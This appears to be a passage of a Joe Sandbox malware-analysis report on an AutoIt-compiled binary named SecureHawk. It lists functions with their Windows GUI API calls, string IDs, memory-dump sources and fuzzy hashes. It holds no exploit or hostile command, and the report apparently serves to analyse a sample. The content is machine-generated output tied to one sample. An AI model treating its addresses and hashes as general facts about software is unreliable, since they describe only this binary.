                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0037AD9D
                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0037ADB2
                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0037ADDA
                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0037AE01
                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0037AE1F
                                  • DrawFocusRect.USER32(?,?), ref: 0037AE2A
                                  • GetSysColor.USER32(00000011), ref: 0037AE38
                                  • SetTextColor.GDI32(?,00000000), ref: 0037AE40
                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0037AE54
                                  • SelectObject.GDI32(?,0037A9E7), ref: 0037AE6B
                                  • DeleteObject.GDI32(?), ref: 0037AE76
                                  • SelectObject.GDI32(?,?), ref: 0037AE7C
                                  • DeleteObject.GDI32(?), ref: 0037AE81
                                  • SetTextColor.GDI32(?,?), ref: 0037AE87
                                  • SetBkColor.GDI32(?,?), ref: 0037AE91
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                  • String ID:
                                  • API String ID: 1996641542-0
                                  • Opcode ID: 811a4b059ea812da061c6976e56e2dc80f1c19d321031c971ebb36dffc8ca946
                                  • Instruction ID: a2043194b3e433e67b21c01042ab7bdcb555e13778d40aba71041c9187a3a2ea
                                  • Opcode Fuzzy Hash: 811a4b059ea812da061c6976e56e2dc80f1c19d321031c971ebb36dffc8ca946
                                  • Instruction Fuzzy Hash: 4D516C71800608BFDB669FA4DC48EAE7B79EF48320F118155F915AB2A1D7759A40CFA0
                                  APIs
                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00378EAE
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00378EBF
                                  • CharNextW.USER32(0000014E), ref: 00378EEE
                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00378F2F
                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00378F45
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00378F56
                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00378F73
                                  • SetWindowTextW.USER32(?,0000014E), ref: 00378FC5
                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00378FDB
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 0037900C
                                  • _memset.LIBCMT ref: 00379031
                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0037907A
                                  • _memset.LIBCMT ref: 003790D9
                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00379103
                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 0037915B
                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00379208
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0037922A
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00379274
                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003792A1
                                  • DrawMenuBar.USER32(?), ref: 003792B0
                                  • SetWindowTextW.USER32(?,0000014E), ref: 003792D8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                  • String ID: 0
                                  • API String ID: 1073566785-4108050209
                                  • Opcode ID: 334b9b10fffa90af65efb74fe445091de1a63f17b291437bdfe10644973b7fd1
                                  • Instruction ID: ec5d6d0dc4e99acdc1c93f05466e9c7f3143c6b05fcde70fff177517916458b5
                                  • Opcode Fuzzy Hash: 334b9b10fffa90af65efb74fe445091de1a63f17b291437bdfe10644973b7fd1
                                  • Instruction Fuzzy Hash: 9AE19F71900218EFDB329F50CC89EEE7BB9EF05710F10C256F919AA191DB788A85DF60
                                  APIs
                                  • GetCursorPos.USER32(?), ref: 00374DCF
                                  • GetDesktopWindow.USER32 ref: 00374DE4
                                  • GetWindowRect.USER32(00000000), ref: 00374DEB
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00374E4D
                                  • DestroyWindow.USER32(?), ref: 00374E79
                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00374EA2
                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00374EC0
                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00374EE6
                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00374EFB
                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00374F0E
                                  • IsWindowVisible.USER32(?), ref: 00374F2E
                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00374F49
                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00374F5D
                                  • GetWindowRect.USER32(?,?), ref: 00374F75
                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00374F9B
                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00374FB5
                                  • CopyRect.USER32(?,?), ref: 00374FCC
                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00375037
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                  • String ID: ($0$tooltips_class32
                                  • API String ID: 698492251-4156429822
                                  • Opcode ID: 59d0be4b28ff56a88bb591558fa90918596de6d844e8c2a5c4af804beb5b589d
                                  • Instruction ID: d0723f125c5f093ac11560b33c7dc3f12af98880b736328aa0c4c268f2d79507
                                  • Opcode Fuzzy Hash: 59d0be4b28ff56a88bb591558fa90918596de6d844e8c2a5c4af804beb5b589d
                                  • Instruction Fuzzy Hash: 17B18871614750AFDB55DF24C984B6BBBE4FF88310F008A1CF6999B292DB75E804CB92
                                  APIs
                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00354809
                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0035482F
                                  • _wcscpy.LIBCMT ref: 0035485D
                                  • _wcscmp.LIBCMT ref: 00354868
                                  • _wcscat.LIBCMT ref: 0035487E
                                  • _wcsstr.LIBCMT ref: 00354889
                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003548A5
                                  • _wcscat.LIBCMT ref: 003548EE
                                  • _wcscat.LIBCMT ref: 003548F5
                                  • _wcsncpy.LIBCMT ref: 00354920
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                  • API String ID: 699586101-1459072770
                                  • Opcode ID: 83d617b49e58131f3070aa68d61c4b14c98f61d4d4a81f1625c9da5666c841db
                                  • Instruction ID: be59bc2b4a2e682fa21c7661a3934b021d9f62421be5ebfa1de511bd04d03855
                                  • Opcode Fuzzy Hash: 83d617b49e58131f3070aa68d61c4b14c98f61d4d4a81f1625c9da5666c841db
                                  • Instruction Fuzzy Hash: CD41F672A002047AE71FB7648C43EFF77ACDF49720F000056FD05AA1A2EB759A9297A5
                                  APIs
                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002F2C8C
                                  • GetSystemMetrics.USER32(00000007), ref: 002F2C94
                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002F2CBF
                                  • GetSystemMetrics.USER32(00000008), ref: 002F2CC7
                                  • GetSystemMetrics.USER32(00000004), ref: 002F2CEC
                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002F2D09
                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002F2D19
                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002F2D4C
                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002F2D60
                                  • GetClientRect.USER32(00000000,000000FF), ref: 002F2D7E
                                  • GetStockObject.GDI32(00000011), ref: 002F2D9A
                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 002F2DA5
                                    • Part of subcall function 002F2714: GetCursorPos.USER32(?), ref: 002F2727
                                    • Part of subcall function 002F2714: ScreenToClient.USER32(003B67B0,?), ref: 002F2744
                                    • Part of subcall function 002F2714: GetAsyncKeyState.USER32(00000001), ref: 002F2769
                                    • Part of subcall function 002F2714: GetAsyncKeyState.USER32(00000002), ref: 002F2777
                                  • SetTimer.USER32(00000000,00000000,00000028,002F1473), ref: 002F2DCC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                  • String ID: AutoIt v3 GUI$h8
                                  • API String ID: 1458621304-1985231161
                                  • Opcode ID: 7b7d7e6f26d6b75a0a90405cca92d67f23a0d34f5a7b1ef491d5bcc19c95ddc4
                                  • Instruction ID: dd2b8b2aeabf51e6a46cf62e1a31009ccbd0b979ddc387ba6f9369995a154e42
                                  • Opcode Fuzzy Hash: 7b7d7e6f26d6b75a0a90405cca92d67f23a0d34f5a7b1ef491d5bcc19c95ddc4
                                  • Instruction Fuzzy Hash: 40B17B75A1020ADFDB15DFA8DC86BADBBA8FB08354F104229FB15E7290DB74A854CF50
                                  APIs
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                  • GetForegroundWindow.USER32(00380980,?,?,?,?,?), ref: 0031040E
                                  • IsWindow.USER32(?), ref: 003464A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$Foreground_memmove
                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                  • API String ID: 3828923867-1919597938
                                  • Opcode ID: b3c3df37dc24878a20f755b71a77475cbc2524468e2eb2d61499f883fa744305
                                  • Instruction ID: 16ab185396ef1b0273bd70c41f51aa46bdb781f74b5d6d2bfa43013c166db6e1
                                  • Opcode Fuzzy Hash: b3c3df37dc24878a20f755b71a77475cbc2524468e2eb2d61499f883fa744305
                                  • Instruction Fuzzy Hash: BAD1B6301046029BCB0FEF21C4929AABBE5FF56344F404A1DF4564F6A2DB70F999CB92
                                  APIs
                                  • CharUpperBuffW.USER32(?,?), ref: 00374274
                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00374334
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BuffCharMessageSendUpper
                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                  • API String ID: 3974292440-719923060
                                  • Opcode ID: 0a4eb365a5c9e011681485859da9df924a50deb0b913d7ab49d7665768bfa94d
                                  • Instruction ID: dff7c29399c4e3c56da2e0cbc41e8636b7731372c7a0c55fb8d10a024e7d4e84
                                  • Opcode Fuzzy Hash: 0a4eb365a5c9e011681485859da9df924a50deb0b913d7ab49d7665768bfa94d
                                  • Instruction Fuzzy Hash: 65A190302146019FCB2AEF10C852A7AB3A9FF85314F10896CB96A9F6D2DB74FC15CB51
                                  APIs
                                  • GetClassNameW.USER32(?,?,00000100), ref: 0034AF5E
                                  • __swprintf.LIBCMT ref: 0034AFFF
                                  • _wcscmp.LIBCMT ref: 0034B012
                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0034B067
                                  • _wcscmp.LIBCMT ref: 0034B0A3
                                  • GetClassNameW.USER32(?,?,00000400), ref: 0034B0DA
                                  • GetDlgCtrlID.USER32(?), ref: 0034B12C
                                  • GetWindowRect.USER32(?,?), ref: 0034B162
                                  • GetParent.USER32(?), ref: 0034B180
                                  • ScreenToClient.USER32(00000000), ref: 0034B187
                                  • GetClassNameW.USER32(?,?,00000100), ref: 0034B201
                                  • _wcscmp.LIBCMT ref: 0034B215
                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0034B23B
                                  • _wcscmp.LIBCMT ref: 0034B24F
                                    • Part of subcall function 0031378E: _iswctype.LIBCMT ref: 00313796
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                  • String ID: %s%u
                                  • API String ID: 3744389584-679674701
                                  • Opcode ID: 183acfbc8ba41630495cc84b6e21a1b7304fe5ae46a00e9644bb249d0932a22f
                                  • Instruction ID: 4fda3bf9244082abfbd6a8a8e9670a6708f8d7859c3c3d939151a925735acf3c
                                  • Opcode Fuzzy Hash: 183acfbc8ba41630495cc84b6e21a1b7304fe5ae46a00e9644bb249d0932a22f
                                  • Instruction Fuzzy Hash: 63A1AF71204706AFD71ADF60C884BAAF7E8FF48354F004A19F9999A190EB30F959CB91
                                  APIs
                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 0034B894
                                  • _wcscmp.LIBCMT ref: 0034B8A5
                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 0034B8CD
                                  • CharUpperBuffW.USER32(?,00000000), ref: 0034B8EA
                                  • _wcscmp.LIBCMT ref: 0034B908
                                  • _wcsstr.LIBCMT ref: 0034B919
                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0034B951
                                  • _wcscmp.LIBCMT ref: 0034B961
                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 0034B988
                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0034B9D1
                                  • _wcscmp.LIBCMT ref: 0034B9E1
                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 0034BA09
                                  • GetWindowRect.USER32(00000004,?), ref: 0034BA72
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                  • String ID: @$ThumbnailClass
                                  • API String ID: 1788623398-1539354611
                                  • Opcode ID: 90c88b14041eb4b27ee24cfe6459b260ef514bde070ba5449980b92f9933265e
                                  • Instruction ID: 03944e037bb6bb41563d8fa9e4e23ace33f85aefe350c6a5aa8c42315da1f6b5
                                  • Opcode Fuzzy Hash: 90c88b14041eb4b27ee24cfe6459b260ef514bde070ba5449980b92f9933265e
                                  • Instruction Fuzzy Hash: FF817E71108305ABDB16DF14C985FAAB7ECEF44354F048569FE898E096DB30ED49CB61
                                  APIs
                                    • Part of subcall function 002F29E2: GetWindowLongW.USER32(?,000000EB), ref: 002F29F3
                                  • DragQueryPoint.SHELL32(?,?), ref: 0037CA4A
                                    • Part of subcall function 0037AF24: ClientToScreen.USER32(?,?), ref: 0037AF4D
                                    • Part of subcall function 0037AF24: GetWindowRect.USER32(?,?), ref: 0037AFC3
                                    • Part of subcall function 0037AF24: PtInRect.USER32(?,?,0037C437), ref: 0037AFD3
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0037CAB3
                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0037CABE
                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0037CAE1
                                  • _wcscat.LIBCMT ref: 0037CB11
                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0037CB28
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0037CB41
                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0037CB58
                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0037CB7A
                                  • DragFinish.SHELL32(?), ref: 0037CB81
                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0037CC74
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr;
                                  • API String ID: 169749273-1659021676
                                  • Opcode ID: cb618ce25172de158fe84c0ce8a63826e32e19b366d6b56bba48ad4f66fc4595
                                  • Instruction ID: bee07c46abeac4f4b2426ae40bf3757c57222ed0bc81dd5f33e9c02e1c86e741
                                  • Opcode Fuzzy Hash: cb618ce25172de158fe84c0ce8a63826e32e19b366d6b56bba48ad4f66fc4595
                                  • Instruction Fuzzy Hash: 34618E71108301AFC716EF60DC85D9FBBE8EF89750F000A2DF696971A1DB709A49CB52
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                  • API String ID: 1038674560-1810252412
                                  • Opcode ID: a6bb8c307baea010fa08fe177a24590661ee26bc59fd930672c1ef345706b70f
                                  • Instruction ID: ab02b82fa98d30dde60294ec475a32ae9b10f5523b9d027e06fab222ad739a15
                                  • Opcode Fuzzy Hash: a6bb8c307baea010fa08fe177a24590661ee26bc59fd930672c1ef345706b70f
                                  • Instruction Fuzzy Hash: 33317231A45205AADB1BEBA0CD93EEDB7E8EF19750F20052AF402790D6EF61BE04C651
                                  APIs
                                  • LoadIconW.USER32(00000063), ref: 0034C98D
                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0034C99F
                                  • SetWindowTextW.USER32(?,?), ref: 0034C9B6
                                  • GetDlgItem.USER32(?,000003EA), ref: 0034C9CB
                                  • SetWindowTextW.USER32(00000000,?), ref: 0034C9D1
                                  • GetDlgItem.USER32(?,000003E9), ref: 0034C9E1
                                  • SetWindowTextW.USER32(00000000,?), ref: 0034C9E7
                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0034CA08
                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0034CA22
                                  • GetWindowRect.USER32(?,?), ref: 0034CA2B
                                  • SetWindowTextW.USER32(?,?), ref: 0034CA96
                                  • GetDesktopWindow.USER32 ref: 0034CA9C
                                  • GetWindowRect.USER32(00000000), ref: 0034CAA3
                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0034CAEF
                                  • GetClientRect.USER32(?,?), ref: 0034CAFC
                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0034CB21
                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0034CB4C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                  • String ID:
                                  • API String ID: 3869813825-0
                                  • Opcode ID: 114fd03e4a96cbcb545dbbba81fe7c748509080d0bae00004854389c5c680831
                                  • Instruction ID: 26b9bbb533e3ea8a789aab5727a17ee39fb6941f634bc271e9a0898d115ca3cd
                                  • Opcode Fuzzy Hash: 114fd03e4a96cbcb545dbbba81fe7c748509080d0bae00004854389c5c680831
                                  • Instruction Fuzzy Hash: 63517C31A00709EFDB62DFA8CD89B6EBBF9FF04705F000929E586A65A0D774B914CB50
                                  APIs
                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 003654C3
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 003654CE
                                  • LoadCursorW.USER32(00000000,00007F03), ref: 003654D9
                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 003654E4
                                  • LoadCursorW.USER32(00000000,00007F01), ref: 003654EF
                                  • LoadCursorW.USER32(00000000,00007F81), ref: 003654FA
                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00365505
                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00365510
                                  • LoadCursorW.USER32(00000000,00007F86), ref: 0036551B
                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00365526
                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00365531
                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0036553C
                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00365547
                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00365552
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 0036555D
